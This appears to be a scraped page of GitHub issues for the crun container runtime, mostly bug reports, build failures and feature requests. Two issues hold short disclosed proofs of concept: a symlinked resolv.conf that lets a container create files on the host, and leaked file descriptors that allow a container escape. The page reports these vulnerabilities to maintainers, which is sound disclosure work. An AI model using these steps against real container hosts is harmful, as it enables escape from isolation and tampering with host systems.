containers / crun Goto Github PK

crun @ b86fb1a does not seem to work with the latest Docker

$ docker run -it --rm --runtime=crun busybox
docker: Error response from daemon: OCI runtime create failed: seccomp_rule_add: unknown.

$ docker info
Client:
 Debug Mode: false

Server:
 Containers: 0
  Running: 0
  Paused: 0
  Stopped: 0
 Images: 26
 Server Version: dev
 Storage Driver: overlay2
  Backing Filesystem: extfs
  Supports d_type: true
  Native Overlay Diff: true
 Logging Driver: json-file
 Cgroup Driver: cgroupfs
 Plugins:
  Volume: local
  Network: bridge host ipvlan macvlan null overlay
  Log: awslogs fluentd gcplogs gelf journald json-file local logentries splunk syslog
 Swarm: inactive
 Runtimes: crun kata runc runnc runsc runsc-kvm
 Default Runtime: runc
 Init Binary: docker-init
 containerd version: 894b81a4b802e4eb2a91d1ce216b8817763c29fb
 runc version: 8011af4a96d657f5ab1cff56273308dd1e13c9eb
 init version: fec3683
 Security Options:
  apparmor
  seccomp
   Profile: default
 Kernel Version: 4.15.0-47-generic
 Operating System: Ubuntu 18.04.2 LTS
 OSType: linux
 Architecture: x86_64
 CPUs: 2
 Total Memory: 7.767GiB
 Name: suda-ws01
 ID: b95a52c4-8aa3-4a34-ac17-f6e0644e95cc
 Docker Root Dir: /var/lib/docker
 Debug Mode: true
  File Descriptors: 22
  Goroutines: 44
  System Time: 2019-04-11T20:41:22.566149249+09:00
  EventsListeners: 0
 Username: akihirosuda
 Registry: https://index.docker.io/v1/
 Labels:
 Experimental: true
 Insecure Registries:
  127.0.0.0/8
 Live Restore Enabled: false

WARNING: No swap limit support

$ docker version
Client:
 Version:           19.03.0-dev
 API version:       1.40
 Go version:        go1.12.2
 Git commit:        ac758d9f
 Built:             Thu Apr 11 11:35:42 2019
 OS/Arch:           linux/amd64
 Experimental:      true

Server:
 Engine:
  Version:          dev
  API version:      1.40 (minimum version 1.12)
  Go version:       go1.12.3
  Git commit:       fc52433fa6
  Built:            Thu Apr 11 11:34:56 2019
  OS/Arch:          linux/amd64
  Experimental:     true
 containerd:
  Version:          v1.2.6
  GitCommit:        894b81a4b802e4eb2a91d1ce216b8817763c29fb
 runc:
  Version:          1.0.0-rc6+dev
  GitCommit:        8011af4a96d657f5ab1cff56273308dd1e13c9eb
 docker-init:
  Version:          0.18.0
  GitCommit:        fec3683

Error: cannot set limits without cgroups: OCI runtime error

So I tried using crun on CentOS 8 on a frankensystem with RPMs from Fedora 30 to get newer podman/conmon and crun

1. Host is CentOS 8; cgroups V1
2. podman is stock 1.0.5 and tried master branch
3. conmon is 2.0.2-1 (rebuilt from src.rpm)
4. crun is the Fedora 30 binary

Version: 1.6.3-dev
RemoteAPI Version: 1
Go Version: go1.13.4
Git Commit: 8e5aad97dda150f8e871c1b394824496f4b849ea
Built: Mon Nov 4 23:51:26 2019
OS/Arch: linux/amd64

I am getting

podman  run --rm -it --name tmp_101 centos:8                                                                      
container create failed: cannot set limits without cgroups

The cgroup_manager is "systemd".

# rpm -q conmon podman crun
conmon-2.0.2-1.el8.x86_64
podman from master branch containers/libpod
crun-0.10.2-1.fc30.x86_64

1. I have podman 1.6.1 on a fc30 and fc31 host

2. runnning rootless

podman run --rm -it bitwardenrs/server:alpine

starts and runs on fc30 with runc
failed to run on fc31
error message is -
Error: executable file not found in $PATH: No such file or directory: OCI runtime command not found error

so tried
podman run --rm -it bitwardenrs/server:alpine /bitwarden_rs

which works fine
error.txt
new.txt
old.txt

I'm building v0.9.1, and I'm seeing this compilation error:

  CC       src/libcrun/libcrun_la-seccomp.lo
src/libcrun/seccomp.c: In function ‘libcrun_apply_seccomp’:
src/libcrun/seccomp.c:123:13: error: ‘SECCOMP_FILTER_FLAG_LOG’ undeclared (first use in this function)
     flags = SECCOMP_FILTER_FLAG_LOG|SECCOMP_FILTER_FLAG_SPEC_ALLOW;
             ^
src/libcrun/seccomp.c:123:13: note: each undeclared identifier is reported only once for each function it appears in
src/libcrun/seccomp.c:123:37: error: ‘SECCOMP_FILTER_FLAG_SPEC_ALLOW’ undeclared (first use in this function)
     flags = SECCOMP_FILTER_FLAG_LOG|SECCOMP_FILTER_FLAG_SPEC_ALLOW;
                                     ^

Looks like these flags are new since linux 4.14/4.17. Can we add something to switch based on seccomp version? Is this safe at runtime, if for example I run a static container-built binary on an older kernel? If not, maybe we also need runtime checks.

$HOME is a missing environment variable in running container with crun:

podman run --name bb -ti docker.io/library/busybox sh
/ # env
HOSTNAME=77fcb215cce2
SHLVL=1
container=podman
TERM=xterm
PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
PWD=/

With runc:

 podman run --name bb -ti docker.io/library/busybox sh
/ # env
HOSTNAME=7913850b674c
SHLVL=1
HOME=/root
container=podman
TERM=xterm
PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
PWD=/

the logging (src/libcrun/error.c) is currently a mess, it needs to be simplified and polished

Docker is reporting error on parsing crun version:

Aug 28 09:24:08 fedora-unleashed dockerd[2639]: time="2019-08-28T09:24:08.085535495-03:00" level=warning msg="failed to parse /usr/local/bin/crun version: unknown output format: crun 0.7\nspec: 1.0.0\n+SYSTEMD +SELINUX +CAP +SECCOMP +EBPF +YAJL\n"

Docker is configured like this:

{
  "default-runtime": "crun",
  "debug": false,
  "max-concurrent-uploads": 1,
  "runtimes": {
    "crun": {
        "path": "/usr/local/bin/crun",
        "runtimeArgs": [
              "--debug"
      ]
    }
  }
}

I use https://github.com/genuinetools/img to pull / unpack images and it fails with:

/ # img pull alpine 
Error: unable to check runc version

It checks runc version first... :(

crun --version

crun 0.7
spec: 1.0.0
+SELINUX +CAP +SECCOMP +EBPF +YAJL

runc --version

runc version spec: 1.0.1-dev

$ sudo crun list
cannot opendir '/run/crun': No such file or directory

$ crun list
cannot opendir '/run/user/1000/crun': No such file or directory

Perhaps crun should automatically create a directory when required.

I am not sure there is a requirement to keep complete cli compatibility with runc, if is not the case, it would be interesting to have "crun list -a" to be able to list non started containers.

This would be somehow equivalent to "docker ps -a" .

Currently is hard to understand/debug scenarios like the following:

$ crun create my_own_id
2019-11-08T13:51:42.000586462Z: use --console-socket with create when a terminal is used
~/tmp/test

$ crun create my_own_id
2019-11-08T13:51:45.000322611Z: container 'my_own_id' already exists

$ crun list
NAME PID STATUS BUNDLE PATH
~/tmp/test

I am running configure --with-python-bindings on Ubuntu 19.10, the configure fails because it is unable to locate the python3 headers.

As far I could understand, the problem is related to:
PKG_CHECK_MODULES([PYTHON], [python], [], [AC_MSG_ERROR([*** python headers not found])])
On Ubuntu 19.10 the python3 PKGCONFIG file is python3.pc, CHECK_MODULE is search only for "python.pc".

/kind bug

$ podman --version
podman version 1.6.1

The following command fails with rootless podman.

$ podman run --rm -v /dev:/dev -it fedora /bin/bash
Error: container_linux.go:346: starting container process caused "process_linux.go:449: container init caused \"open /dev/console: permission denied\"": OCI runtime permission denied error

The current workaround is to..

$ podman run --rm -v /dev:/dev -i fedora /bin/bash
$ podman exec -it `podman ps -q` /bin/bash

When trying to run crun with arguments in the wrong order, it does not work but the error message is not so clear:

$ ./crun create containerid --bundle /home/alban/oci/c1
2018-03-09T17:54:33.000102555Z: error loading config.json

When using the correct order (./crun create --bundle /home/alban/oci/c1 containerid), it works.

I found this issue when trying to run the OCI runtime validation tests.

runtime-tools seems to do the wrong thing here (I just filed opencontainers/runtime-tools#600) according to the CLI spec. But maybe the crun arguments parsing could be made more flexible, or improve the error message somehow?

When running a rootless oci spec, and no uid mappings are set, a specific error message should be displayed. Now it fails with a mount error.

How to reproduce:
$ sudo mv /etc/subuid /etc/subuid.off
$ sudo mv /etc/subgid /etc/subgid.off
$ crun run config.json
2019-11-08T13:14:26.000942292Z: mount 'devpts' to '/home/jpinto/tmp/rootfs/dev/pts': Invalid argument
~/tmp

The behavior from runc:
$ runc run config.json
ERRO[0000] User namespaces enabled, but no uid mappings found.
User namespaces enabled, but no uid mappings found.

to be compatible with runC, we need to lookup argv[0] into $PATH once we are in the new mount namespace, so that start can fail immediately if the specified command doesn't exist.

While following the provided directions to build a static image, I get the following error:

$ sudo make -C contrib/static-builder-x86_64 build-image
make: Entering directory '/home/kittyhacker101/test/crun/contrib/static-builder-x86_64'
podman  build  -t crun-builder .
STEP 1: FROM fedora AS base

Getting image source signatures
Copying blob a83dac7d1094 done
Copying config 21304c8f88 done
Writing manifest to image destination
Storing signatures
Getting image source signatures
Copying blob 22457ad8e7df done
Copying config 6a76f80daa done
Writing manifest to image destination
Storing signatures
Error: error creating build container: The following failures happened while trying to pull image specified by "fedora" based on search registries in /etc/containers/registries.conf:
* "localhost/fedora": Error initializing source docker://localhost/fedora:latest: pinging docker registry returned: Get https://localhost/v2/: dial tcp [::1]:443: connect: connection refused
* "docker.io/library/fedora": Error committing the finished image: error adding layer with blob "sha256:a83dac7d1094257f061af9dd1d3963e1708ee568c584a22007febbb8b249fa1e": Error processing tar file(exit status 1): Error cleaning up after pivot: remove /.pivot_root929792229: device or resource busy
* "registry.fedoraproject.org/fedora": Error committing the finished image: error adding layer with blob "sha256:22457ad8e7df49c0981e036f095173263c328867ba6b7f7a35e9bcbf5ee8fc60": Error processing tar file(exit status 1): Error cleaning up after pivot: remove /.pivot_root707258341: device or resource busy
* "quay.io/fedora": Error initializing source docker://quay.io/fedora:latest: Error reading manifest latest in quay.io/fedora: error parsing HTTP 404 response body: invalid character '<' looking for beginning of value: "<!DOCTYPE HTML PUBLIC \"-//W3C//DTD HTML 3.2 Final//EN\">\n<title>404 Not Found</title>\n<h1>Not Found</h1>\n<p>The requested URL was not found on the server.  If you entered the URL manually please check your spelling and try again.</p>\n"
* "registry.access.redhat.com/fedora": Error initializing source docker://registry.access.redhat.com/fedora:latest: Error reading manifest latest in registry.access.redhat.com/fedora: name unknown: Repo not found
* "registry.centos.org/fedora": Error initializing source docker://registry.centos.org/fedora:latest: Error reading manifest latest in registry.centos.org/fedora: manifest unknown: manifest unknown
make: *** [Makefile:13: build-image] Error 125
make: Leaving directory '/home/kittyhacker101/test/crun/contrib/static-builder-x86_64'

I'm using the latest commit (a4440eb), I have Podman 1.4.3 installed, and I'm using Manjaro Linux.

crun follows symlinks when creating mount points, allowing a malicious container to create arbitrary empty files in the host filesystem.

runc resolves the symlink relative to the container rootfs using SecureJoin and creates /opt/resolv.conf inside the container instead.

/CC @giuseppe @rhatdan @cyphar

mkdir -p rootfs/etc
ln -s /opt/resolv.conf rootfs/etc/resolv.conf

cat <<EOF > Dockerfile
FROM busybox
ADD rootfs /
EOF

podman build -t poc --no-cache .
podman run --runtime=crun poc

ls -lisaZ /opt
# 133154 0 -rwx------.  1 root root unconfined_u:object_r:usr_t:s0    0 Sep 29 16:47 resolv.conf

Works with SELinux on.

Tested with crun at 66cd22c and podman 1.5.1 on Fedora 30.

(--no-cache required when playing with the POC due to containers/buildah#1875)

crun doesn't work with latest moby seccomp profile because crun doesn't support io_uring_enter .

moby/moby@f4d41f1

I feel my eyes are suffering because the current code style uses 2-space indentation. None of the successful projects I am aware of are using this style. Could we adopt something like kernel or another well-known?

To run inside of a ramdisk the --no-pivot option is needed?

--no-pivot do not use pivot root to jail process inside rootfs. This should be used whenever the rootfs is on top of a ramdisk

Under musl libc, stderr is defined as (stderr) in stdio.h, which breaks crun and libocispec because there's a stderr member in the context structure.

Per ISO C99, this is legal - stderr is allowed to be a macro (see discussion here: http://lists.llvm.org/pipermail/llvm-commits/Week-of-Mon-20130506/173524.html). So, the use of stderr as a structure member is not valid.

I keep getting this when I try and create a container:
level=error msg="Container creation error: writing file 'cpu.shares': Bad file descriptor

ls /sys/fs/cgroup/cpu/kubepods/burstable/pod7f8667b0aa2fc59394329cc63d147fc3/
cgroup.clone_children  crio-conmon-018a9e0c4d02ed0ac3acadcb240df7d7e718a6264af811930048f75b55d16a58  crio-conmon-845ae88564fc18e50064223a1cefd85536d0a105fd6a50d14ca48a55be936114
cgroup.procs           crio-conmon-031f3ac376b34d2eecec24f263fcfd800091ad001013852ba42ecd4a5a2595e4  crio-conmon-a537c8308319eb1ab7710b9c4c4f1a590ae47c013dc38876908c8e3a7e070dbb
cpu.cfs_period_us      crio-conmon-3816120e55090b077cbdf75b62696b1e58b2655b8ee5165f28662cb9c165e3e3  crio-conmon-b4d592875062642b8627445dc26a9b80556442a8879f8deeb7be43a0d3f51c33
cpu.cfs_quota_us       crio-conmon-3aab6d526c5d97b401b287b6ecd28de911919940892b9a7a68e5adfdb969e57e  crio-conmon-c2295e785211b185f5726c647a24841cc3e444d4ca7bd0c7e29be87794f007c3
cpu.rt_period_us       crio-conmon-41c02b86cf760effc235e0b6498b45723102d23ce1daffa7cbd926ce0bd55da6  crio-conmon-d21d06f567283e6de85e51f0b87ad796fbca5f4dc397ab4748e2ae66bde5956e
cpu.rt_runtime_us      crio-conmon-468e517c34b9c0c9a4b466cbd00c89f859e00ee6b01fc89db54cd4bfa5c44499  crio-conmon-d8996193794ec44cde3dc14125f0481b5f6d4ec998dc1e6ac00d09ad4f002792
cpu.shares             crio-conmon-4cc0b934f3393dd33a40310ba09d6e3c9c0c2a498cfd1ceee8ac45d8d2201ba7  notify_on_release
cpu.stat               crio-conmon-7fcf8b268ab7050a1d4b2ee330aa4397169b60a431174ce463dff2a2d1096a21  tasks

Notice crio-UUID is missing

cat /sys/fs/cgroup/cpu/kubepods/burstable/pod7f8667b0aa2fc59394329cc63d147fc3/cpu.shares 
256

the folder is there but it is empty.

As discussed on IRC, creating a separate tracking bug for crun. Same issue as opencontainers/runc#2128, same PoC with crun runtime.

See #109

runc has no dangerous fds to leak, but crun does, allowing for an easy escape:

mkdir -p rootfs/proc/self/fd
touch rootfs/proc/self/fd/{4,5}

cat <<EOF > Dockerfile
FROM busybox
ADD rootfs /
VOLUME /proc
EOF

docker build -t poc .
docker run --runtime=crun --name poc poc sleep inf &

lsof -p $(pidof sleep)

COMMAND   PID USER   FD   TYPE             DEVICE SIZE/OFF       NODE NAME
sleep   12215 root  cwd    DIR              0,126     4096     927459 /
sleep   12215 root  rtd    DIR              0,126     4096     927459 /
sleep   12215 root  txt    REG              0,126  1132888     397156 /bin/sleep
sleep   12215 root  mem    REG              252,1              397156 /bin/sleep (path inode=11903)
sleep   12215 root    0r   CHR                1,3      0t0      11168 /dev/null
sleep   12215 root    1w  FIFO               0,12      0t0     571231 pipe
sleep   12215 root    2w  FIFO               0,12      0t0     571232 pipe
sleep   12215 root    3u  unix 0xffff993efdcf9c00      0t0     571223 @/containerd-shim/moby/aa7dd60d6ee454d873da9ebd452257e51d340a3d6aa1009c90afd5825f442690/shim.sock@ type=STREAM
sleep   12215 root    4u   REG               0,24        0     572760 /run/containerd/io.containerd.runtime.v1.linux/moby/aa7dd60d6ee454d873da9ebd452257e51d340a3d6aa1009c90afd5825f442690/log.json
sleep   12215 root    6r  FIFO               0,12      0t0     572766 pipe
sleep   12215 root    7w  FIFO               0,12      0t0     572766 pipe
sleep   12215 root    8u   REG               0,24     7632     571234 /run/docker/runtime-crun/moby/aa7dd60d6ee454d873da9ebd452257e51d340a3d6aa1009c90afd5825f442690/seccomp.bpf
sleep   12215 root    9r   REG                0,3        0 4026531992 /run/docker/netns/default

podman specifies the volume mount first and then /proc, so it's not affected.

Hey there,

is it possible to integrate crun as a "runtime" in docker to use its ecosystem?
Like runsc from gvisor: https://github.com/google/gvisor

Adding it to the daemon.json like gvisor or something:

{
    "runtimes": {
        "runsc": {
            "path": "/usr/local/bin/runsc"
        }
    }
}

Being able to use it like this:

docker run --runtime=crun --rm hello-world

Host: Arch Linux x86_64
Crun version: 0.9.1

How to reproduce:
podman run --runtime=/usr/bin/crun -it --rm i386/debian:stable-slim

Result:

Sep 18 22:04:47 arch systemd-coredump[39094]: Process 39086 (bash) of user 1000 dumped core.
Stack trace of thread 1:
#0  0x00000000f7f08735 n/a (/lib/i386-linux-gnu/ld-2.28.so)

Works fine with default runtime (runc).

On Fedora 31, /proc/self/cgroup output is different after 'mock' is run on the host, I'm guessing due to systemd-nspawn usage. The new output confuses podman+crun, as well as libvirt.

• systemd bug: https://bugzilla.redhat.com/show_bug.cgi?id=1756143
• libvirt bug: https://bugzilla.redhat.com/show_bug.cgi?id=1751120

Before

$ cat /proc/self/cgroup
0::/user.slice/user-1000.slice/...

After mock:

$ cat /proc/self/cgroup
1:name=systemd:/
0::/user.slice/user-1000.slice/...
$ podman run --rm -it alpine sh 
Error: creating cgroup directory '/sys/fs/cgroup/name=systemd/user.slice/user-1000.slice/[email protected]/user.slice/libpod-498cc4ceeee46ea3a04a12b8e495989c92074ae1513081332fed5312a2d9dc68.scope': Permission denied: OCI runtime error

I'm not sure if the cgroup behavior is intentional or not, hence the systemd bug I filed. The kernel docs do say that it is valid for other cgroups to be listed there, but they are v1 cgroups and not v2: https://www.kernel.org/doc/html/v5.3/admin-guide/cgroup-v2.html#processes

Below is a patch that 'fixes' crun usage for me, by only attempting to create the cgroup subdirectory for the cgroupv2 root path, ignoring everything else, in this case the name=systemd cgroup. But again I'm not sure if that's correct or not. If it is I will send a PR

diff --git a/src/libcrun/cgroup.c b/src/libcrun/cgroup.c
index 30ec248..77d3f4f 100644
--- a/src/libcrun/cgroup.c
+++ b/src/libcrun/cgroup.c
@@ -494,6 +494,10 @@ int systemd_finalize (oci_container_linux_resources *resources, int cgroup_mode,
       subpath = strchr (subsystem, ':') + 1;
       *(subpath - 1) = '\0';
 
+      /* Only process cgroupv2, which will have no listed subsystem */
+      if (strcmp(subsystem, ""))
+        continue;
+
       if (strcmp (subpath, *path))
         {
           ret = enter_cgroup_subsystem (pid, subsystem, *path, 1, err);

It seems that the YAJL_CFLAGS etc found via pkg-config are not used for the actual compilation. I got it to work by appending it to all the *_CFLAGS in Makefile.am and libocispec/Makefile.am, but I'm not an expert in autotools and I'm not sure if that's the best approach.

when running as a rootless user honor the user.rootlesscontainers xattrs and emulate them through a seccomp from userspace trap: https://lwn.net/Articles/756167/

If I understand the spec correctly, "rwm" flag can be also written as "mwr"
https://github.com/opencontainers/runtime-spec/blob/v1.0.1/config-linux.md#device-whitelist

Didn't look into the code yet but it's a reproducer in 100 percent of the cases.

I'm struggling to learn how to use Crun. Is there an intro with examples how to run a container, etc.?

Thanks.

# podman run --uidmap=0:100000:5000 fedora mount | grep sysrq

Versus

# podman run fedora mount | grep sysrq
proc on /proc/sysrq-trigger type proc (ro,relatime)

I modify libpod.conf to use runc.

# podman run --uidmap=0:100000:5000 fedora mount | grep sysrq
proc on /proc/sysrq-trigger type proc (ro,relatime)

The message below makes me think this is an issue between cgroups & runc. I'm not sure if this is the cause or symptomatic of something else.

STEP 1: FROM registry.access.redhat.com/ubi8
STEP 2: ADD --chown=1000:1000 ocp4 /ocp4
c9cd957f1685bbc1addeb9a8296ee140bc3ff14f116f09f793d95e4d5b658745
STEP 3: RUN yum install -y openssh-clients sudo; yum -y clean all
WARN[0000] signal: killed
ERRO[0000] container_linux.go:346: starting container process caused "process_linux.go:297: applying cgroup configuration for process caused "mountpoint for cgroup not found""
container_linux.go:346: starting container process caused "process_linux.go:297: applying cgroup configuration for process caused "mountpoint for cgroup not found""
error running container: error creating container for [/bin/sh -c yum install -y openssh-clients sudo; yum -y clean all]: : exit status 1
Error: error building at STEP "RUN yum install -y openssh-clients sudo; yum -y clean all": error while running runtime: exit status 1

How to report vulnerabilities should be clarified in the document.

Hi,

Thank you for crun : it's really, really more fast than runc ... 🥇
I'm actually using it in 2 little kubernetes/cri-o clusters and with podman.
I wrote an ebuild (Gentoo package: https://bugs.gentoo.org/687202) for the integration in my OS but the tag 0.5 is currently broken at execution with podman, some error like 'Bad argument[...]' , but it works fine with the commit f81874f.
Please could you do another tag?

In the runc era, there is a testsuite called runctst that has been matured in testing on RHEL and occasionally Fedora, which depend only on skopeo and python3-psutils.

crun has its own tests which are similar which seems have less testing coverage than runctst. Do you think it make sense to merge runctst into the crun tests to have one single python file that could use for regression testing?

crun should support checkpointing and restoring running containers.

add support for SD_NOTIFY when using crun create and crun start.

The current logic for handling NOTIFY_SOCKET must be changed so that we bind mount the parent directory of the notify socket. In this way "start" can create the socket that will still be accessible from the container, since the parent directory is mounted.

I would like to try crun as docker runtime. How can I set it up to use it with docker run option --runtime=crun?

I currently tried kata with --runtime=kata-runtime and find it quite interesting. It would be nice to try crun, too.

Moby depends on runc ps command for docker top implementation

I tried ./configure LDFLAGS=-static but it did not produce static binary

I'm installing crun as non-root user to a local directory:
GO stuff goes into /home/podman/go and installed stuff into /home/podman/usr/

After make install I'm getting this:

/bin/mkdir -p '/home/podman/usr/local/lib'
/bin/bash ./libtool   --mode=install /usr/bin/install -c   libcrun.la '/home/podman/usr/local/lib'
libtool: install: /usr/bin/install -c .libs/libcrun.lai /home/podman/usr/local/lib/libcrun.la
libtool: install: /usr/bin/install -c .libs/libcrun.a /home/podman/usr/local/lib/libcrun.a
libtool: install: chmod 644 /home/podman/usr/local/lib/libcrun.a
libtool: install: ranlib /home/podman/usr/local/lib/libcrun.a
libtool: warning: remember to run 'libtool --finish /usr/local/lib'

The last warning me a little bellyache. Libtool is somewhere (found it it in /home/go/src/github.com/containers/crun/libtool) and /usr/local/lib is missing the prefix.

Sure, this is a special case, but maybe a bug for others, too. But hmm, why do I need to run libtool manually at all?

If I try to run toolbox create followed by podman start fedora-toolbox-31, I get following error (which is supposedly form crun)

Error: unable to start container "fedora-toolbox-31": cannot configure rootless cgroup using the cgroupfs manager
cannot set limits without cgroups: OCI runtime error

crun-0.10-1.fc31.x86_64 https://koji.fedoraproject.org/koji/buildinfo?buildID=1393143

crun list misses the running / stopped state of containers as shown with runc.
Would it possible to add it?

Had a problem with tmpfs inside of a container and not noticed it until I tried to enter it (crun exec <NAME> <CMD>).

Runc logs errors to both, the log file and stderr for errors that are returned via the main() and some programs depend on these error messages.

https://github.com/opencontainers/runc/blob/master/main.go#L156

We should probably do the same in crun.

Should be added to dependencies (fresh build environment inside of a ubuntu docker container):

• autoconf (./autogen.sh: 9: exec: autoreconf: not found)
• python3 (configure: error: no suitable Python interpreter found)

It would be great to have proper documentation on what resources are supported and unsupported in cgroup2 mode